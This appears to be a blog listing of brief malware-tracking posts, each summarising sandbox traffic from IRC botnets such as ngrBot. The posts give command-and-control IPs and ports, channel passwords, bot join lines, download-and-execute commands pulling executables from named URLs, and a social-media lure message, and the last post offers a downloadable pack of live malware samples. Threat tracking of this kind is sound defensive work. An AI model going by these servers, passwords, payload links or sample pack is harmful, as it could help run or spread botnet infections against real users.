Author: Pig

61.31.99.67(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)

Uncategorized

Remote Host Port Number 199.15.234.7 80 63.223.121.212 80 85.214.46.98 80 61.31.99.67 1863 61.31.99.67 4042 NICK new[USA|XP|COMPUTERNAME]ncsrmcq USER xd “” “lol” :xd JOIN #newbiz# PONG 422 * The data identified by the following URLs was then requested from the remote web server: o http://api.wipmania.com/ o http://www.4freeimagehost.com/uploads/a8dfab5dd1c0.jpg o http://85.214.46.98/test/new.exe o http://85.214.46.98/test/biz.exe hosting infos: http://whois.domaintools.com/61.31.99.67

219.98.181.47(ngrBot hosted in Japan Tokyo So-net Service)

Uncategorized

Remote Host Port Number 199.15.234.7 80 83.233.33.6 80 219.98.181.47 4244 PASS stark PRIVMSG #Nh :[DNS]: Blocked 1310 domain(s) – Redirected 0 domain(s) NICK n{US|XPa}riqmriq USER riqmriq 0 0 :riqmriq JOIN #Nh NhG PRIVMSG #nh :[HTTP]: Updated HTTP spread interval to “3” PRIVMSG #nh :[HTTP]: Updated HTTP spread message to “Estas foto es tuyo? 😀 http://ho.io/p8zn?=www.facebook.com/profile/4373748”Read more...

184.154.174.202(ngrBot hosted in United States Chicago Singlehop Inc)

Uncategorized

Remote Host Port Number 184.154.174.202 1888 PASS strike 199.15.234.7 80 70.38.98.236 80 NICK n{US|XPa}zjjqhnh USER zjjqhnh 0 0 :zjjqhnh JOIN #asdf strike JOIN #XP JOIN #US PRIVMSG #XP :[d=”http://img102.herosh.com/2011/09/26/125094789.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/184.154.174.202

109.169.37.16(ngrBot hosted in United Kingdom Maidenhead Rapidswitch Ltd)

Uncategorized

Remote Host Port Number 109.169.37.16 7777 PASS laekin0505x 199.15.234.7 80 65.254.250.108 80 NICK n{US|XPa}gvplpfy USER gvplpfy 0 0 :gvplpfy JOIN #totalrenovation2011 ngrBot PRIVMSG #totalrenovation2011 :[d=”http://teraniprom.com/admin/product_picture/FINAL.exe” s=”114688 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 PRIVMSG #totalrenovation2011 :[d=”http://teraniprom.com/admin/product_picture/Winsoft.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataMcxaxm.exe” – Download retries: 0 * TheRead more...

208.117.34.161(ngrBot hosted in United States Laird Hill Steadfast Networks)

Uncategorized

Remote Host Port Number 199.15.234.7 80 70.38.98.236 80 208.117.34.161 1888 PASS strike NICK n{US|XPa}rpgrbzy USER rpgrbzy 0 0 :rpgrbzy JOIN #asdf strike JOIN #XP JOIN #US PRIVMSG #XP :[d=”http://img102.herosh.com/2011/09/23/174023232.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/208.117.34.161

115mb malware samples

Uncategorized

This package contains 115mb of worms,trojans,irc bots,stealers etc have fun searching them Download: http://adf.ly/2rm49 http://adf.ly/2rmAC